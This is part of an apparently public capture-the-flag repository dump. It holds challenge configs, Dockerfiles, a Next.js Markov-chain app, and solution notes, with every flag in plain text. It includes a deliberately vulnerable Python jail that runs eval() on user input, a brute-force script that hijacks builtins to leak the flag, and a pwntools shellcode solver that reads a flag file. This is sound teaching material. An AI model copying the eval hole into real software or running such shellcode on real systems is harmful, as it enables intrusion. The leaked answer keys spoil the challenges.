| 28 | # local env files 29 | .env*.local 30 | 31 | # vercel 32 | .vercel 33 | 34 | # typescript 35 | *.tsbuildinfo 36 | next-env.d.ts 37 | -------------------------------------------------------------------------------- /Challenges/Misc/Shikanoko/dist/README.md: -------------------------------------------------------------------------------- 1 | # Shikanoko but it's a Markov chain 2 | 3 | This was forked from https://github.com/nyraa/shikanoko-markov-chain -------------------------------------------------------------------------------- /Challenges/Misc/Shikanoko/dist/next.config.mjs: -------------------------------------------------------------------------------- 1 | /** @type 
{import('next').NextConfig} */ 2 | const nextConfig = { 3 | output: "export", 4 | // basePath: "/shikanoko-markov-chain", 5 | reactStrictMode: false, 6 | }; 7 | 8 | export default nextConfig; 9 | -------------------------------------------------------------------------------- /Challenges/Misc/Shikanoko/dist/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "shikanoko-markov-chain", 3 | "version": "0.1.0", 4 | "private": true, 5 | "scripts": { 6 | "dev": "next dev", 7 | "build": "next build", 8 | "start": "next start", 9 | "lint": "next lint", 10 | "deploy": "gh-pages -d out -t true --nojekyll" 11 | }, 12 | "dependencies": { 13 | "d3": "^7.9.0", 14 | "next": "14.2.5", 15 | "react": "^18", 16 | "react-dom": "^18", 17 | "react-youtube": "^10.1.0" 18 | }, 19 | "devDependencies": { 20 | "@types/d3": "^7.4.3", 21 | "@types/node": "^20", 22 | "@types/react": "^18", 23 | "@types/react-dom": "^18", 24 | "typescript": "^5" 25 | } 26 | } 27 | -------------------------------------------------------------------------------- /Challenges/Misc/Shikanoko/dist/public/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Misc/Shikanoko/dist/public/favicon.ico -------------------------------------------------------------------------------- /Challenges/Misc/Shikanoko/dist/public/thumbnail.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Misc/Shikanoko/dist/public/thumbnail.png -------------------------------------------------------------------------------- /Challenges/Misc/Shikanoko/dist/public/vercel.svg: -------------------------------------------------------------------------------- 1 | 
-------------------------------------------------------------------------------- /Challenges/Misc/Shikanoko/dist/src/app/components/Footer.tsx: -------------------------------------------------------------------------------- 1 | export default function Footer() 2 | { 3 | return ( 4 | 9 | ); 10 | } -------------------------------------------------------------------------------- /Challenges/Misc/Shikanoko/dist/src/app/components/MarkovChain.css: -------------------------------------------------------------------------------- 1 | /* edge */ 2 | .edges 3 | { 4 | stroke: #7d7d7d; 5 | stroke-width: 2px; 6 | fill: none; 7 | } 8 | .edge-labels 9 | { 10 | user-select: none; 11 | text-anchor: middle; 12 | dominant-baseline: middle; 13 | } 14 | 15 | /* node */ 16 | .nodes 17 | { 18 | stroke: none; 19 | fill: #cccccc; 20 | } 21 | 22 | .node 23 | { 24 | cursor: pointer; 25 | } 26 | 27 | .node.current-node 28 | { 29 | fill: rgb(235, 229, 46); 30 | } 31 | 32 | .labels 33 | { 34 | text-anchor: middle; 35 | dominant-baseline: middle; 36 | pointer-events: none; 37 | } -------------------------------------------------------------------------------- /Challenges/Misc/Shikanoko/dist/src/app/layout.tsx: -------------------------------------------------------------------------------- 1 | import "@app/styles/globals.css"; 2 | import type { Metadata } from "next"; 3 | 4 | export const metadata: Metadata = { 5 | title: "Shikanoko but it's a Markov chain", 6 | description: 'A Markov chain to play the "Shikanoko"', 7 | openGraph: { 8 | images: [ 9 | { 10 | url: "https://nyraa.github.io/shikanoko-markov-chain/thumbnail.png", 11 | width: 1000, 12 | height: 500, 13 | } 14 | ] 15 | } 16 | } 17 | 18 | export default function RootLayout({ 19 | children, 20 | }: { 21 | children: React.ReactNode 22 | }) { 23 | return ( 24 | 25 | {children} 26 | 27 | ) 28 | } 29 | -------------------------------------------------------------------------------- /Challenges/Misc/Shikanoko/dist/src/app/styles/globals.css: 
-------------------------------------------------------------------------------- 1 | body 2 | { 3 | width: 100%; 4 | min-height: 100vh; 5 | margin: 0; 6 | display: flex; 7 | flex-direction: column; 8 | align-items: center; 9 | font-family: sans-serif; 10 | } 11 | footer 12 | { 13 | align-self: flex-start; 14 | margin-top: auto; 15 | padding: 10px; 16 | } -------------------------------------------------------------------------------- /Challenges/Misc/Shikanoko/dist/tsconfig.json: -------------------------------------------------------------------------------- 1 | { 2 | "compilerOptions": { 3 | "lib": [ 4 | "dom", 5 | "dom.iterable", 6 | "esnext" 7 | ], 8 | "allowJs": true, 9 | "skipLibCheck": true, 10 | "strict": true, 11 | "noEmit": true, 12 | "esModuleInterop": true, 13 | "module": "esnext", 14 | "moduleResolution": "bundler", 15 | "resolveJsonModule": true, 16 | "isolatedModules": true, 17 | "jsx": "preserve", 18 | "incremental": true, 19 | "paths": { 20 | "@app/*": [ 21 | "./src/app/*" 22 | ] 23 | }, 24 | "plugins": [ 25 | { 26 | "name": "next" 27 | } 28 | ] 29 | }, 30 | "include": [ 31 | "next-env.d.ts", 32 | "**/*.ts", 33 | "**/*.tsx", 34 | ".next/types/**/*.ts" 35 | ], 36 | "exclude": [ 37 | "node_modules" 38 | ] 39 | } 40 | -------------------------------------------------------------------------------- /Challenges/Misc/Shikanoko/sol/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "sol", 3 | "version": "1.0.0", 4 | "description": "", 5 | "main": "index.js", 6 | "scripts": { 7 | "test": "echo \"Error: no test specified\" && exit 1" 8 | }, 9 | "author": "", 10 | "license": "ISC", 11 | "dependencies": { 12 | "chai": "^5.1.1", 13 | "mocha": "^10.7.0", 14 | "puppeteer": "^22.15.0" 15 | } 16 | } 17 | -------------------------------------------------------------------------------- /Challenges/Misc/Shikanoko/src/.gitignore: 
-------------------------------------------------------------------------------- 1 | # See https://help.github.com/articles/ignoring-files/ for more about ignoring files. 2 | 3 | # dependencies 4 | /node_modules 5 | /.pnp 6 | .pnp.js 7 | .yarn/install-state.gz 8 | 9 | # testing 10 | /coverage 11 | 12 | # next.js 13 | /.next/ 14 | /out/ 15 | 16 | # production 17 | /build 18 | 19 | # misc 20 | .DS_Store 21 | *.pem 22 | 23 | # debug 24 | npm-debug.log* 25 | yarn-debug.log* 26 | yarn-error.log* 27 | 28 | # local env files 29 | .env*.local 30 | 31 | # vercel 32 | .vercel 33 | 34 | # typescript 35 | *.tsbuildinfo 36 | next-env.d.ts 37 | -------------------------------------------------------------------------------- /Challenges/Misc/Shikanoko/src/README.md: -------------------------------------------------------------------------------- 1 | # Shikanoko but it's a Markov chain 2 | Demo at [here](https://nyraa.github.io/shikanoko-markov-chain/) 3 | 4 | This idea was inspired by this video: 5 | [![thumbnail](https://img.youtube.com/vi/Xkq13ZthmA0/0.jpg)](https://youtu.be/Xkq13ZthmA0) 6 | 7 | ## To run 8 | ``` 9 | npm run dev 10 | # or 11 | yarn dev 12 | # or 13 | pnpm dev 14 | # or 15 | bun dev 16 | ``` 17 | 18 | ## References 19 | - [Markov chain in D3](https://github.com/matheusportela/markov-chain) -------------------------------------------------------------------------------- /Challenges/Misc/Shikanoko/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | shikanokonokonoko: 3 | privileged: false 4 | build: . 
5 | ports: 6 | - "8000:8000" -------------------------------------------------------------------------------- /Challenges/Misc/Shikanoko/src/next.config.mjs: -------------------------------------------------------------------------------- 1 | /** @type {import('next').NextConfig} */ 2 | const nextConfig = { 3 | output: "export", 4 | // basePath: "/shikanoko-markov-chain", 5 | reactStrictMode: false, 6 | }; 7 | 8 | export default nextConfig; 9 | -------------------------------------------------------------------------------- /Challenges/Misc/Shikanoko/src/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "shikanoko-markov-chain", 3 | "version": "0.1.0", 4 | "private": true, 5 | "scripts": { 6 | "dev": "next dev -p 8000", 7 | "build": "next build", 8 | "start": "next start -p 8000", 9 | "lint": "next lint", 10 | "deploy": "gh-pages -d out -t true --nojekyll" 11 | }, 12 | "dependencies": { 13 | "d3": "^7.9.0", 14 | "next": "14.2.5", 15 | "react": "^18", 16 | "react-dom": "^18", 17 | "react-youtube": "^10.1.0" 18 | }, 19 | "devDependencies": { 20 | "@types/d3": "^7.4.3", 21 | "@types/node": "^20", 22 | "@types/react": "^18", 23 | "@types/react-dom": "^18", 24 | "typescript": "^5" 25 | } 26 | } 27 | -------------------------------------------------------------------------------- /Challenges/Misc/Shikanoko/src/public/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Misc/Shikanoko/src/public/favicon.ico -------------------------------------------------------------------------------- /Challenges/Misc/Shikanoko/src/public/thumbnail.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Misc/Shikanoko/src/public/thumbnail.png -------------------------------------------------------------------------------- /Challenges/Misc/Shikanoko/src/public/vercel.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Challenges/Misc/Shikanoko/src/src/app/components/Footer.tsx: -------------------------------------------------------------------------------- 1 | export default function Footer() 2 | { 3 | return ( 4 | 9 | ); 10 | } -------------------------------------------------------------------------------- /Challenges/Misc/Shikanoko/src/src/app/components/MarkovChain.css: -------------------------------------------------------------------------------- 1 | /* edge */ 2 | .edges 3 | { 4 | stroke: #7d7d7d; 5 | stroke-width: 2px; 6 | fill: none; 7 | } 8 | .edge-labels 9 | { 10 | user-select: none; 11 | text-anchor: middle; 12 | dominant-baseline: middle; 13 | } 14 | 15 | /* node */ 16 | .nodes 17 | { 18 | stroke: none; 19 | fill: #cccccc; 20 | } 21 | 22 | .node 23 | { 24 | cursor: pointer; 25 | } 26 | 27 | .node.current-node 28 | { 29 | fill: rgb(235, 229, 46); 30 | } 31 | 32 | .labels 33 | { 34 | text-anchor: middle; 35 | dominant-baseline: middle; 36 | pointer-events: none; 37 | } -------------------------------------------------------------------------------- /Challenges/Misc/Shikanoko/src/src/app/layout.tsx: -------------------------------------------------------------------------------- 1 | import "@app/styles/globals.css"; 2 | import type { Metadata } from "next"; 3 | 4 | export const metadata: Metadata = { 5 | title: "Shikanoko but it's a Markov chain", 6 | description: 'A Markov chain to play the "Shikanoko"', 7 | openGraph: { 8 | images: [ 9 | { 10 | url: "https://nyraa.github.io/shikanoko-markov-chain/thumbnail.png", 11 | 
width: 1000, 12 | height: 500, 13 | } 14 | ] 15 | } 16 | } 17 | 18 | export default function RootLayout({ 19 | children, 20 | }: { 21 | children: React.ReactNode 22 | }) { 23 | return ( 24 | 25 | {children} 26 | 27 | ) 28 | } 29 | -------------------------------------------------------------------------------- /Challenges/Misc/Shikanoko/src/src/app/styles/globals.css: -------------------------------------------------------------------------------- 1 | body 2 | { 3 | width: 100%; 4 | min-height: 100vh; 5 | margin: 0; 6 | display: flex; 7 | flex-direction: column; 8 | align-items: center; 9 | font-family: sans-serif; 10 | } 11 | footer 12 | { 13 | align-self: flex-start; 14 | margin-top: auto; 15 | padding: 10px; 16 | } -------------------------------------------------------------------------------- /Challenges/Misc/Shikanoko/src/tsconfig.json: -------------------------------------------------------------------------------- 1 | { 2 | "compilerOptions": { 3 | "lib": [ 4 | "dom", 5 | "dom.iterable", 6 | "esnext" 7 | ], 8 | "allowJs": true, 9 | "skipLibCheck": true, 10 | "strict": true, 11 | "noEmit": true, 12 | "esModuleInterop": true, 13 | "module": "esnext", 14 | "moduleResolution": "bundler", 15 | "resolveJsonModule": true, 16 | "isolatedModules": true, 17 | "jsx": "preserve", 18 | "incremental": true, 19 | "paths": { 20 | "@app/*": [ 21 | "./src/app/*" 22 | ] 23 | }, 24 | "plugins": [ 25 | { 26 | "name": "next" 27 | } 28 | ] 29 | }, 30 | "include": [ 31 | "next-env.d.ts", 32 | "**/*.ts", 33 | "**/*.tsx", 34 | ".next/types/**/*.ts" 35 | ], 36 | "exclude": [ 37 | "node_modules" 38 | ] 39 | } 40 | -------------------------------------------------------------------------------- /Challenges/Misc/castingspells/challenge.yml: -------------------------------------------------------------------------------- 1 | name: Casting Spells 2 | author: scuffed 3 | category: misc 4 | description: "Frieren: 'Why did you enable `VisualHostKey`?'\nHeiter:'It's what Himmel the hero would 
have done.'\nMake the spells collide!" 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{impr3ss1ve_m4na_f3rn} 13 | 14 | connection_info: nc hostname 8000 15 | 16 | state: visible 17 | version: "0.1" 18 | -------------------------------------------------------------------------------- /Challenges/Misc/castingspells/solution.md: -------------------------------------------------------------------------------- 1 | this is a direct implementation of the drunken bishop randomart algorithm used by openssh (http://www.dirk-loss.de/sshvis/drunken_bishop.pdf), and since the fingerprint is given, you just find a cycle in the walk and submit that. 2 | 3 | if challenge becomes too confusing to interact with, partial source will be provided. 4 | 5 | flag: `blahaj{impr3ss1ve_m4na_f3rn}` -------------------------------------------------------------------------------- /Challenges/Misc/castingspells/src/Dockerfile: -------------------------------------------------------------------------------- 1 | # start from the official slim Python 3.12 image (floating tag, not pinned by digest) 2 | FROM python:3.12-slim 3 | 4 | RUN apt update && apt install -y socat 5 | 6 | # switch working directory 7 | WORKDIR /app 8 | 9 | # install numpy with pip; no requirements file is used here and the version is not pinned 10 | RUN pip install numpy 11 | 12 | # copy the whole build context into the image 13 | COPY . /app 14 | # NOTE(review): there is no USER instruction, so the entrypoint runs as the image default user (root for this base image); consider creating an unprivileged user and switching to it before ENTRYPOINT. 15 | ENTRYPOINT ["sh"] 16 | CMD [ "/app/entry.sh" ] -------------------------------------------------------------------------------- /Challenges/Misc/castingspells/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | castingspells: 3 | privileged: false 4 | build: .
5 | ports: 6 | - "8000:8000" 7 | -------------------------------------------------------------------------------- /Challenges/Misc/castingspells/src/entry.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | socat TCP-LISTEN:8000,nodelay,reuseaddr,fork EXEC:"timeout -s KILL 10m python3 /app/main.py" -------------------------------------------------------------------------------- /Challenges/Misc/jigsawpuzzle/challenge.yml: -------------------------------------------------------------------------------- 1 | name: Jigsaw Puzzle 2 | author: treeindustry 3 | category: misc 4 | description: | 5 | Dear Haj, 6 | 7 | How have your holidays been? If you have no plans for New Year's Eve, 8 | would you like to join us? All of our friends will be there. It will 9 | be a fun party! Here is the location: 10 | https://docs.google.com/presentation/d/12PRILGsZBu3irFufoidmHN5uQXi9Uyzj5vvKqzChnfM 11 | 12 | 13 | flags: 14 | - blahaj{h4PpY_nEw_y3aR_My_Fr13ND} 15 | -------------------------------------------------------------------------------- /Challenges/Misc/jigsawpuzzle/dist/puzzle.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Misc/jigsawpuzzle/dist/puzzle.png -------------------------------------------------------------------------------- /Challenges/Misc/jigsawpuzzle/sol/part1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Misc/jigsawpuzzle/sol/part1.png -------------------------------------------------------------------------------- /Challenges/Misc/modelanswer/challenge.yml: -------------------------------------------------------------------------------- 1 | name: Model Answer 2 | author: fern 3 | category: misc 4 | 
description: Heard AI is very popular these days... so I trained my very own AI to protect my servers! And since we all know no human can understand model weights, you can even have the weights I used for my AI! Try and hack me now! 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{v3Ry_1nTeL1igEnT_A1} 13 | 14 | files: 15 | - dist/server.py 16 | - dist/ai.h5 17 | 18 | connection_info: nc hostname 8000 19 | 20 | state: visible 21 | version: "0.1" 22 | -------------------------------------------------------------------------------- /Challenges/Misc/modelanswer/dist/ai.h5: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Misc/modelanswer/dist/ai.h5 -------------------------------------------------------------------------------- /Challenges/Misc/modelanswer/solution.md: -------------------------------------------------------------------------------- 1 | # Solution 2 | 3 | Solve script in `solve/`. 
-------------------------------------------------------------------------------- /Challenges/Misc/modelanswer/solve/ai.h5: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Misc/modelanswer/solve/ai.h5 -------------------------------------------------------------------------------- /Challenges/Misc/modelanswer/src/Dockerfile: -------------------------------------------------------------------------------- 1 | # start by pulling the python image 2 | FROM python:3.11-slim-bookworm 3 | 4 | RUN apt update && apt install -y socat 5 | 6 | # copy the requirements file into the image 7 | COPY ./requirements.txt /app/requirements.txt 8 | 9 | # switch working directory 10 | WORKDIR /app 11 | 12 | # install the packages listed in requirements.txt (that file names tensorflow and numpy without version pins, so each build resolves whatever is current) 13 | RUN pip install -r requirements.txt 14 | 15 | # copy the whole build context into the image 16 | COPY . /app 17 | # create an unprivileged account and switch to it, so the entrypoint below does not run as root 18 | RUN adduser --uid 1001 --disabled-password nonroot 19 | USER 1001 20 | 21 | ENTRYPOINT ["sh"] 22 | CMD [ "/app/entry.sh" ] -------------------------------------------------------------------------------- /Challenges/Misc/modelanswer/src/ai.h5: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Misc/modelanswer/src/ai.h5 -------------------------------------------------------------------------------- /Challenges/Misc/modelanswer/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | modelanswer: 3 | privileged: false 4 | build: .
5 | ports: 6 | - "8000:8000" 7 | -------------------------------------------------------------------------------- /Challenges/Misc/modelanswer/src/entry.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | socat TCP-LISTEN:8000,nodelay,reuseaddr,fork EXEC:"timeout -s KILL 10m python3 /app/chal.py" -------------------------------------------------------------------------------- /Challenges/Misc/modelanswer/src/requirements.txt: -------------------------------------------------------------------------------- 1 | tensorflow 2 | numpy -------------------------------------------------------------------------------- /Challenges/Misc/modelanswer2/dist/models.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Misc/modelanswer2/dist/models.zip -------------------------------------------------------------------------------- /Challenges/Misc/modelanswer2/solution.md: -------------------------------------------------------------------------------- 1 | A model inversion challenge. 2 | Solution code in `soln/` 3 | Concept: 4 | 1. Attach another model to the inputs of the original model 5 | 2. Freeze the parameters of the original model 6 | 3. Train the attacker model to generate something that makes the original model say "ok accepted" 7 | 4. Remove the original model, get the outputs of the attacker model, and you can see the image used to train 8 | 5. Repeat for all 6 numbers, great success 9 | 10 | Flag: `blahaj{246748}` -------------------------------------------------------------------------------- /Challenges/Misc/one_call_away/challenge.yml: -------------------------------------------------------------------------------- 1 | name: One Call Away 2 | author: jiajie 3 | category: misc 4 | description: Here's an extremely simple pyjail, where the flag is just one print() call away.
5 | 6 | Wait, who swapped the last 2 lines? 7 | 8 | value: 500 9 | type: dynamic 10 | decay: 40 11 | minimum: 100 12 | 13 | flags: 14 | - blahaj{3x1t_h4nDl3r} 15 | 16 | files: 17 | - dist/jail.py 18 | 19 | connection_info: nc hostname 5000 20 | 21 | state: visible 22 | version: "0.1" 23 | -------------------------------------------------------------------------------- /Challenges/Misc/one_call_away/dist/jail.py: -------------------------------------------------------------------------------- 1 | import threading 2 | del threading # unbinds the name only; the module stays loaded in sys.modules 3 | # Substring denylist applied to the raw input below; any name not listed here is still reachable. 4 | blacklist = [ 5 | '__dict__', 6 | 'exec', 7 | 'eval', 8 | 'breakpoint', 9 | 'open', 10 | 'license', 11 | 'copyright', 12 | 'credits', 13 | ] 14 | 15 | if __name__ == '__main__': 16 | code = input('> ') 17 | # Input filters: ASCII only, no denylisted substring, at most one '(' character. They are assert statements, so they would be skipped under python -O. 18 | assert code.isascii(), 'Nope' 19 | assert all(word not in code for word in blacklist), 'Nope' 20 | assert code.count('(') <= 1, 'This is a simple pyjail, you only need one call!' 21 | # NOTE(review): eval() runs the client's expression with this module's globals and unrestricted builtins; the filters above narrow the input but are not a sandbox. 22 | eval(code) 23 | flag = open('flag.txt').read() # flag.txt is read only after eval() returns 24 | 25 | -------------------------------------------------------------------------------- /Challenges/Misc/one_call_away/solve/s.py: -------------------------------------------------------------------------------- 1 | from string import ascii_letters, digits 2 | from pwn import * 3 | 4 | context.log_level = 'error' 5 | 6 | space = ascii_letters + digits + '_{}' 7 | 8 | flag = '' 9 | while not flag.endswith('}'): 10 | for c in space: 11 | t = remote('localhost', 5000) 12 | t.sendlineafter('> ', f'setattr(__builtins__, "reversed", lambda a: flag[{len(flag)}] == "{c}" or 1/0)') 13 | output = t.recvall() 14 | if b'ZeroDivisionError' not in output: 15 | flag += c 16 | print(flag) 17 | break 18 | 19 | -------------------------------------------------------------------------------- /Challenges/Misc/one_call_away/src/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.11-slim 2 | WORKDIR /app 3 | 4 | RUN useradd -m ctfuser 5 | RUN apt update
6 | RUN apt install -y socat 7 | 8 | COPY . /app 9 | RUN chmod -R 555 /app 10 | 11 | USER ctfuser 12 | 13 | ENTRYPOINT ["sh"] 14 | CMD [ "/app/entry.sh" ] 15 | -------------------------------------------------------------------------------- /Challenges/Misc/one_call_away/src/entry.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | socat TCP-LISTEN:8000,nodelay,reuseaddr,fork EXEC:"timeout -s KILL 10m python3 /app/jail.py",stderr -------------------------------------------------------------------------------- /Challenges/Misc/one_call_away/src/flag.txt: -------------------------------------------------------------------------------- 1 | blahaj{3x1t_h4nDl3r} 2 | -------------------------------------------------------------------------------- /Challenges/Misc/one_call_away/src/jail.py: -------------------------------------------------------------------------------- 1 | import threading 2 | del threading # unbinds the name only; the module stays loaded in sys.modules 3 | # Substring denylist applied to the raw input below; any name not listed here is still reachable. 4 | blacklist = [ 5 | '__dict__', 6 | 'exec', 7 | 'eval', 8 | 'breakpoint', 9 | 'open', 10 | 'license', 11 | 'copyright', 12 | 'credits', 13 | ] 14 | 15 | if __name__ == '__main__': 16 | code = input('> ') 17 | # Input filters: ASCII only, no denylisted substring, at most one '(' character. They are assert statements, so they would be skipped under python -O. 18 | assert code.isascii(), 'Nope' 19 | assert all(word not in code for word in blacklist), 'Nope' 20 | assert code.count('(') <= 1, 'This is a simple pyjail, you only need one call!' 21 | # NOTE(review): eval() runs the client's expression with this module's globals and unrestricted builtins; the filters above narrow the input but are not a sandbox. 22 | eval(code) 23 | flag = open('flag.txt').read() # flag.txt is read only after eval() returns 24 | 25 | -------------------------------------------------------------------------------- /Challenges/Misc/scanme/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "scan me!" 2 | author: "scuffed" 3 | category: misc 4 | description: it's in the name, dude.
5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | files: 12 | - dist/image.png 13 | 14 | flags: 15 | - blahaj{QR4ZY_R3P41R} 16 | 17 | state: visible 18 | 19 | version: "0.1" -------------------------------------------------------------------------------- /Challenges/Misc/scanme/dist/image.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Misc/scanme/dist/image.png -------------------------------------------------------------------------------- /Challenges/Misc/scanme/solution.md: -------------------------------------------------------------------------------- 1 | Literally just repair the QR code. takes maybe 10-15 minutes. 2 | 3 | Flag: `blahaj{QR4ZY_R3P41R}` -------------------------------------------------------------------------------- /Challenges/Misc/shellcraft_shenanigans/challenge.yml: -------------------------------------------------------------------------------- 1 | name: shellcraft shenanigans 2 | author: FS 3 | category: pwn 4 | description: | 5 | > How well do you know about C system calls? 
(Note: flag is stored in /home/ctfuser/challenge/flag.txt) 6 | 7 | flags: 8 | - blahaj{5h0u1d_h4v3_u53d_4_wh174l157_1ns734d_0f_4_bl4ckl157} 9 | 10 | -------------------------------------------------------------------------------- /Challenges/Misc/shellcraft_shenanigans/dist/chall: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Misc/shellcraft_shenanigans/dist/chall -------------------------------------------------------------------------------- /Challenges/Misc/shellcraft_shenanigans/sol.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Challenges/Misc/shellcraft_shenanigans/solve/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | #p=process("../dist/./chall") 4 | p=remote("127.0.0.1","1337") 5 | #gdb.attach(p) 6 | context(os='linux',arch='amd64') 7 | context.log_level='DEBUG' 8 | 9 | payload=shellcraft.openat(-1,"/home/ctfuser/challenge/flag.txt") 10 | payload+=shellcraft.sendfile(1,'rax',0,4096) 11 | 12 | p.sendline(asm(payload)) 13 | 14 | p.interactive() 15 | -------------------------------------------------------------------------------- /Challenges/Misc/shellcraft_shenanigans/src/chall: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Misc/shellcraft_shenanigans/src/chall -------------------------------------------------------------------------------- /Challenges/Misc/shellcraft_shenanigans/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | shellcraftshenanigans: 3 | privileged: false 4 | build: . 
5 | ports: 6 | - "8000:8000" 7 | -------------------------------------------------------------------------------- /Challenges/Misc/shellcraft_shenanigans/src/flag.txt: -------------------------------------------------------------------------------- 1 | blahaj{5h0u1d_h4v3_u53d_4_wh174l157_1ns734d_0f_4_bl4ckl157} 2 | -------------------------------------------------------------------------------- /Challenges/Osint/README.md: -------------------------------------------------------------------------------- 1 | Osint Challenges -------------------------------------------------------------------------------- /Challenges/Osint/bad coder/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "bad coder" 2 | author: "scuffed" 3 | category: osint 4 | description: "My friend is learning to code but I think he's pretty bad at it. I've been trying to catch him lacking, maybe some poorly written code or something... all I've got is a username: `yattana_yattana`. Don't even know what it's for, can you help me out?" 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{c4r3fuL_w17h_y0UR_c0MM175} 13 | 14 | state: visible 15 | 16 | version: "0.1" -------------------------------------------------------------------------------- /Challenges/Osint/bad coder/solution.md: -------------------------------------------------------------------------------- 1 | Find twitter account, then github account. Go to the right branch of the sole repo and find .env commit. 2 | 3 | Flag: `blahaj{c4r3fuL_w17h_y0UR_c0MM175}` -------------------------------------------------------------------------------- /Challenges/Osint/mrt/challenge.yml: -------------------------------------------------------------------------------- 1 | name: MRT 2 | author: hartmannsyg 3 | category: osint 4 | description: Help I am stuck in the MRT? Which station am I in? Flag format is `blahaj{mrt_name_in_lowercase}`. 
Replace spaces with underscores. Leave dashes as is. 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{dover} 13 | -------------------------------------------------------------------------------- /Challenges/Osint/mrt/dist/mrt.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Osint/mrt/dist/mrt.jpg -------------------------------------------------------------------------------- /Challenges/Pwn/2wrongsDontMakeARight/challenge.yml: -------------------------------------------------------------------------------- 1 | name: 2 wrongs dont make a right 2 | author: FS 3 | category: pwn 4 | description: | 5 | > My friend recently told me 2 wrongs don't make a right but I think that's wrong. Prove me wrong. (Note: the value in a certain local variable on the stack can be different on the remote server but please don't bruteforce the value against the remote server) 6 | 7 | flags: 8 | - blahaj{i_gUes3_i_w@s_wR0ng} 9 | -------------------------------------------------------------------------------- /Challenges/Pwn/2wrongsDontMakeARight/dist/ld-linux-x86-64.so.2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/2wrongsDontMakeARight/dist/ld-linux-x86-64.so.2 -------------------------------------------------------------------------------- /Challenges/Pwn/2wrongsDontMakeARight/dist/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/2wrongsDontMakeARight/dist/libc.so.6 -------------------------------------------------------------------------------- 
/Challenges/Pwn/2wrongsDontMakeARight/dist/vuln: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/2wrongsDontMakeARight/dist/vuln -------------------------------------------------------------------------------- /Challenges/Pwn/2wrongsDontMakeARight/irrelevant/vuln: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/2wrongsDontMakeARight/irrelevant/vuln -------------------------------------------------------------------------------- /Challenges/Pwn/2wrongsDontMakeARight/src/buildx: -------------------------------------------------------------------------------- 1 | Not Found -------------------------------------------------------------------------------- /Challenges/Pwn/2wrongsDontMakeARight/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | 2wdmar: 3 | privileged: false 4 | build: . 
